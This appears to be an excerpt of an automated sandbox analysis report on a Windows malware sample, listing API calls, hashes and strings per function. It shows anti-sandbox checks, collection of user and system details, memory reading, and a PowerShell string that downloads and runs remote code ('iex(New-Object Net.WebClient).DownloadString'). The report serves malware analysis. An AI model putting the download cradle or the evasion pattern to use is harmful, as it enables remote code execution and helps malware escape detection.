                        • Instruction Fuzzy Hash: 6941B6BAD402087BDB14EBE0DC46FEE777DAB88304F00455DB61A571C1EA795B888B92
                        APIs
                        • memset.MSVCRT ref: 040B433C
                        • RegOpenKeyExA.ADVAPI32(80000001,0064A4D8,00000000,00020119,?), ref: 040B435B
                        • RegQueryValueExA.ADVAPI32(?,0064A0D4,00000000,00000000,00000000,000000FF), ref: 040B437F
                        • RegCloseKey.ADVAPI32(?), ref: 040B4389
                        • lstrcat.KERNEL32(?,00000000), ref: 040B43AE
                        • lstrcat.KERNEL32(?,0064A168), ref: 040B43C2
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$CloseOpenQueryValuememset
                        • String ID:
                        • API String ID: 2623679115-0
                        • Opcode ID: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                        • Instruction ID: 7504596a76602f89fec6bbbd526ffb00169b60d402fb4e0f62f0ee2b7f5979b2
                        • Opcode Fuzzy Hash: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                        • Instruction Fuzzy Hash: 6D41A7B6D40108BBEB14FBE0DC45FEE737DAB89304F00855CA65567280EA756798CBE1
                        APIs
                        • strtok_s.MSVCRT ref: 00413588
                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                        • strtok_s.MSVCRT ref: 004136D1
                          • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,024A5C80,?,0042110C,?,00000000), ref: 0041A82B
                          • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpystrtok_s$lstrlen
                        • String ID:
                        • API String ID: 3184129880-0
                        • Opcode ID: 64ab5e27dc640e177239ea1b756d4cc1ada2d3f0f35c5ecd3cd97600b2ebe9e7
                        • Instruction ID: 1d6e97e2126c91d023f3aa3275f065f217875d3b7f18f669bcfd2096c4fc0c60
                        • Opcode Fuzzy Hash: 64ab5e27dc640e177239ea1b756d4cc1ada2d3f0f35c5ecd3cd97600b2ebe9e7
                        • Instruction Fuzzy Hash: C34191B1D00108EFCB04EFE5D945AEEB7B4BF44308F00801EE41676291DB789A56CFAA
                        APIs
                        • __lock.LIBCMT ref: 0041B39A
                          • Part of subcall function 0041AFAC: __mtinitlocknum.LIBCMT ref: 0041AFC2
                          • Part of subcall function 0041AFAC: __amsg_exit.LIBCMT ref: 0041AFCE
                          • Part of subcall function 0041AFAC: EnterCriticalSection.KERNEL32(?,?,?,0041AC60,0000000E,0042A0F0,0000000C,0041AC2A), ref: 0041AFD6
                        • DecodePointer.KERNEL32(0042A130,00000020,0041B4DD,?,00000001,00000000,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E), ref: 0041B3D6
                        • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F0,0000000C,0041AC2A), ref: 0041B3E7
                          • Part of subcall function 0041BE35: EncodePointer.KERNEL32(00000000,0041C063,004495B8,00000314,00000000,?,?,?,?,?,0041B707,004495B8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041BE37
                        • DecodePointer.KERNEL32(-00000004,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F0,0000000C,0041AC2A), ref: 0041B40D
                        • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F0,0000000C,0041AC2A), ref: 0041B420
                        • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F0,0000000C,0041AC2A), ref: 0041B42A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                        • String ID:
                        • API String ID: 2005412495-0
                        • Opcode ID: b7f77734ebbf3840f36807ba88357d63e713c7e7dec9936b016044a468d43742
                        • Instruction ID: 63863d844e937e4da23c5f373c227dc8c5909fe93770eb0c6870133be37feb4a
                        • Opcode Fuzzy Hash: b7f77734ebbf3840f36807ba88357d63e713c7e7dec9936b016044a468d43742
                        • Instruction Fuzzy Hash: 05314874900309DFDF109FA9C9452DEBAF1FF48314F10802BE454A6262CBB94891DFAE
                        APIs
                          • Part of subcall function 040B9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 040B9B08
                          • Part of subcall function 040B9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 040B9B21
                          • Part of subcall function 040B9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 040B9B39
                          • Part of subcall function 040B9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 040B9B51
                          • Part of subcall function 040B9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 040B9B6A
                          • Part of subcall function 040B9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 040B9B82
                          • Part of subcall function 040B9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 040B9B9A
                          • Part of subcall function 040B9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 040B9BB3
                          • Part of subcall function 040B9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 040B9BCB
                          • Part of subcall function 040B9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 040B9BE3
                          • Part of subcall function 040B9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 040B9BFC
                          • Part of subcall function 040B9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 040B9C14
                          • Part of subcall function 040B9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 040B9C2C
                          • Part of subcall function 040B9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 040B9C45
                          • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                          • Part of subcall function 040A1437: ExitProcess.KERNEL32 ref: 040A1478
                          • Part of subcall function 040A13C7: GetSystemInfo.KERNEL32(?), ref: 040A13D1
                          • Part of subcall function 040A13C7: ExitProcess.KERNEL32 ref: 040A13E5
                          • Part of subcall function 040A1377: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 040A1392
                          • Part of subcall function 040A1377: VirtualAllocExNuma.KERNEL32(00000000), ref: 040A1399
                          • Part of subcall function 040A1377: ExitProcess.KERNEL32 ref: 040A13AA
                          • Part of subcall function 040A1487: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 040A14A5
                          • Part of subcall function 040A1487: __aulldiv.LIBCMT ref: 040A14BF
                          • Part of subcall function 040A1487: __aulldiv.LIBCMT ref: 040A14CD
                          • Part of subcall function 040A1487: ExitProcess.KERNEL32 ref: 040A14FB
                          • Part of subcall function 040B69D7: GetUserDefaultLangID.KERNEL32 ref: 040B69DB
                          • Part of subcall function 040A13F7: ExitProcess.KERNEL32 ref: 040A142D
                          • Part of subcall function 040B7AB7: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,040A141E), ref: 040B7AE7
                          • Part of subcall function 040B7AB7: RtlAllocateHeap.NTDLL(00000000), ref: 040B7AEE
                          • Part of subcall function 040B7AB7: GetUserNameA.ADVAPI32(00000104,00000104), ref: 040B7B06
                          • Part of subcall function 040B7B47: GetProcessHeap.KERNEL32(00000000,00000104), ref: 040B7B77
                          • Part of subcall function 040B7B47: RtlAllocateHeap.NTDLL(00000000), ref: 040B7B7E
                          • Part of subcall function 040B7B47: GetComputerNameA.KERNEL32(?,00000104), ref: 040B7B96
                          • Part of subcall function 040BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 040BAC2C
                          • Part of subcall function 040BAC17: lstrcpy.KERNEL32(00000000), ref: 040BAC6B
                          • Part of subcall function 040BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 040BAC79
                          • Part of subcall function 040BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 040BAB6C
                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 040B6D31
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 040B6D4F
                        • CloseHandle.KERNEL32(00000000), ref: 040B6D60
                        • Sleep.KERNEL32(00001770), ref: 040B6D6B
                        • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 040B6D81
                        • ExitProcess.KERNEL32 ref: 040B6D89
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                        • String ID:
                        • API String ID: 2525456742-0
                        • Opcode ID: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                        • Instruction ID: 0eeb0ca27772d2d5fd140d26254a6fea184fff4cc79e10b95dce74beb25e9b88
                        • Opcode Fuzzy Hash: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                        • Instruction Fuzzy Hash: 84312875A40208ABEB04FBF0DC54EFD7379AF5420CF540518A292B6190EF747A44CEAA
                        APIs
                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                        • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                        • ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                        • LocalFree.KERNEL32(004102E7), ref: 00409A90
                        • CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                        • String ID:
                        • API String ID: 2311089104-0
                        • Opcode ID: 7104a1ad71f7267fb3f92d709a770ba7d5c34dd003ba373b3d6e6f2e7190c7f7
                        • Instruction ID: ed52a4b53b9c0591db71eabf51b59360b39b3b260bb7ca760b64e801f0f9a50e
                        • Opcode Fuzzy Hash: 7104a1ad71f7267fb3f92d709a770ba7d5c34dd003ba373b3d6e6f2e7190c7f7
                        • Instruction Fuzzy Hash: 02310778A00209EFDB14CF94C985BAEB7B5FF49350F108169E901A7390D778AD41CFA5
                        APIs
                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 040A9C53
                        • GetFileSizeEx.KERNEL32(000000FF,?), ref: 040A9C78
                        • LocalAlloc.KERNEL32(00000040,?), ref: 040A9C98
                        • ReadFile.KERNEL32(000000FF,?,00000000,040A16F6,00000000), ref: 040A9CC1
                        • LocalFree.KERNEL32(040A16F6), ref: 040A9CF7
                        • CloseHandle.KERNEL32(000000FF), ref: 040A9D01
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                        • String ID:
                        • API String ID: 2311089104-0
                        • Opcode ID: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                        • Instruction ID: 9a131ce33edba3811851c6aac971af703fed433491c241f9a8079dc5091a64e2
                        • Opcode Fuzzy Hash: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                        • Instruction Fuzzy Hash: 4231F6B8A00209EFDB14CF94C885BEE77F6FB49305F108158E915A7290C778AA91CFA1
                        APIs
                        • __getptd.LIBCMT ref: 0041C9EA
                          • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                          • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                        • __amsg_exit.LIBCMT ref: 0041CA0A
                        • __lock.LIBCMT ref: 0041CA1A
                        • InterlockedDecrement.KERNEL32(?), ref: 0041CA37
                        • free.MSVCRT ref: 0041CA4A
                        • InterlockedIncrement.KERNEL32(0042B558), ref: 0041CA62
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                        • String ID:
                        • API String ID: 634100517-0
                        • Opcode ID: 9cc761a24a700c336990656e08babd42fdc3626541d12aa0f7b86557c35da351
                        • Instruction ID: 63787520114d18ae3399c837c16bfac6c494309a1b2e91ce42418771fe72ad0a
                        • Opcode Fuzzy Hash: 9cc761a24a700c336990656e08babd42fdc3626541d12aa0f7b86557c35da351
                        • Instruction Fuzzy Hash: DD01C431A817299BC722EB669C857DE77A0BF04794F11811BE814A7390C73C69D2CBDD
                        APIs
                        • __getptd.LIBCMT ref: 040BCC51
                          • Part of subcall function 040BC206: __getptd_noexit.LIBCMT ref: 040BC209
                          • Part of subcall function 040BC206: __amsg_exit.LIBCMT ref: 040BC216
                        • __amsg_exit.LIBCMT ref: 040BCC71
                        • __lock.LIBCMT ref: 040BCC81
                        • InterlockedDecrement.KERNEL32(?), ref: 040BCC9E
                        • free.MSVCRT ref: 040BCCB1
                        • InterlockedIncrement.KERNEL32(0042B980), ref: 040BCCC9
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                        • String ID:
                        • API String ID: 634100517-0
                        • Opcode ID: 9842265763d25ebdd135a5071e54c4fa9195cc385294f2eefb115a4ad94e6967
                        • Instruction ID: e2daf2b489476666efaeee63b3def1aa5041aed347a88961ed619fb87def5198
                        • Opcode Fuzzy Hash: 9842265763d25ebdd135a5071e54c4fa9195cc385294f2eefb115a4ad94e6967
                        • Instruction Fuzzy Hash: BF010031A04A24ABF762AB6894447DD73A0FF24718F10011ADCD4B7280CB347881DFDD
                        APIs
                        • strlen.MSVCRT ref: 00416F1F
                        • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0041719A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 00416F4D
                          • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416BE1
                          • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416C05
                        • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 00416F92
                        • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041719A), ref: 004170B3
                          • Part of subcall function 00416DE0: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00416DF8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: strlen$MemoryProcessQueryReadVirtual
                        • String ID: @
                        • API String ID: 2950663791-2766056989
                        • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                        • Instruction ID: da6ee04ed372484ea639f8c5ae6d2cf8ded6d6947598eb42fecba3fc0a9bdd2e
                        • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                        • Instruction Fuzzy Hash: 27511CB5E041099BDB04CF98D981AEFBBB5FF88304F108559F919A7340D738EA51CBA5
                        APIs
                        • strlen.MSVCRT ref: 040B7186
                        • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,040B7401,00000000,00420BA8,00000000,00000000), ref: 040B71B4
                          • Part of subcall function 040B6E37: strlen.MSVCRT ref: 040B6E48
                          • Part of subcall function 040B6E37: strlen.MSVCRT ref: 040B6E6C
                        • VirtualQueryEx.KERNEL32(040B7574,00000000,?,0000001C), ref: 040B71F9
                        • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,040B7401), ref: 040B731A
                          • Part of subcall function 040B7047: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 040B705F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: strlen$MemoryProcessQueryReadVirtual
                        • String ID: @
                        • API String ID: 2950663791-2766056989
                        • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                        • Instruction ID: b34be39c4df0fa904e9e00cc5214dea8e8f3e54fe8ec05e49f18684c9057a2b1
                        • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                        • Instruction Fuzzy Hash: 4651F6B1E04209EBDB04CF98D991AEFB7B6BF88700F148529F955B7240D734AA11CBA5
                        APIs
                        • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00406E2A), ref: 00406A19
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: *n@$*n@
                        • API String ID: 1029625771-193229609
                        • Opcode ID: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                        • Instruction ID: a280f62563b1b8af23ece619f3fba2aedbd92eaccb2561d1aa32790852693925
                        • Opcode Fuzzy Hash: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                        • Instruction Fuzzy Hash: DA71C874A00119DFCB04CF48C484BEAB7B2FB88315F158179E80AAF391D739AA91CB95
                        APIs
                        • lstrcat.KERNEL32(?,0064A30C), ref: 040B4A42
                          • Part of subcall function 040B9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 040B9072
                        • lstrcat.KERNEL32(?,00000000), ref: 040B4A68
                        • lstrcat.KERNEL32(?,?), ref: 040B4A87
                        • lstrcat.KERNEL32(?,?), ref: 040B4A9B
                        • lstrcat.KERNEL32(?,0064A284), ref: 040B4AAE
                        • lstrcat.KERNEL32(?,?), ref: 040B4AC2
                        • lstrcat.KERNEL32(?,0064A2C8), ref: 040B4AD6
                          • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                          • Part of subcall function 040B8FF7: GetFileAttributesA.KERNEL32(00000000,?,040A1DBB,?,?,00425654,?,?,00420E1F), ref: 040B9006
                          • Part of subcall function 040B47D7: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 040B47E7
                          • Part of subcall function 040B47D7: RtlAllocateHeap.NTDLL(00000000), ref: 040B47EE
                          • Part of subcall function 040B47D7: wsprintfA.USER32 ref: 040B480D
                          • Part of subcall function 040B47D7: FindFirstFileA.KERNEL32(?,?), ref: 040B4824
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                        • String ID:
                        • API String ID: 2540262943-0
                        • Opcode ID: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                        • Instruction ID: 9f322ab57d54b3dcde37b8cd9d0c52e818b36a5a99c3d7d86014dd4b14a57d39
                        • Opcode Fuzzy Hash: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                        • Instruction Fuzzy Hash: CC3166B6940208ABDB14F7F0CC84EED737DAB58708F4045C9A785A6090DE74A789CFD9
                        APIs
                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                        • ShellExecuteEx.SHELL32(0000003C), ref: 00412D85
                        Strings
                        • ')", xrefs: 00412CB3
                        • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412CC4
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412D04
                        • <, xrefs: 00412D39
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        • API String ID: 3031569214-898575020
                        • Opcode ID: 87b9259d62867265d03d3ccf5b91407801732a693daf99fd9e22ca77cb073214
                        • Instruction ID: 8aa8f54ed0a99c91faffa02525c95fa844b6858a6ee3c68abfdd9097d7126834
                        • Opcode Fuzzy Hash: 87b9259d62867265d03d3ccf5b91407801732a693daf99fd9e22ca77cb073214
                        • Instruction Fuzzy Hash: 08410E71D112089ADB14FBA1C991FDDB774AF10314F50401EE016A7192DF786ADBCFA9
                        APIs
                        • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 040A14A5
                        • __aulldiv.LIBCMT ref: 040A14BF
                        • __aulldiv.LIBCMT ref: 040A14CD
                        • ExitProcess.KERNEL32 ref: 040A14FB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                        • String ID: @
                        • API String ID: 3404098578-2766056989
                        • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                        • Instruction ID: b5684d820d0320b11381d73fbe87d5e8c3027c0d287ff9393c26748eaca1cbe5
                        • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                        • Instruction Fuzzy Hash: 8901FBB0950308FAEB10EFE4DC89BDDBAB9AB05709F208448E7057B2C0D6B4A5558759
                        APIs
                        • memcmp.MSVCRT(?,00421264,00000003), ref: 040AA094
                          • Part of subcall function 040BAA07: lstrcpy.KERNEL32(?,00000000), ref: 040BAA4D
                          • Part of subcall function 040B0CC7: memset.MSVCRT ref: 040B0E83
                          • Part of subcall function 040B0CC7: lstrcat.KERNEL32(?,00000000), ref: 040B0E9C
                          • Part of subcall function 040B0CC7: lstrcat.KERNEL32(?,00420D7C), ref: 040B0EAE
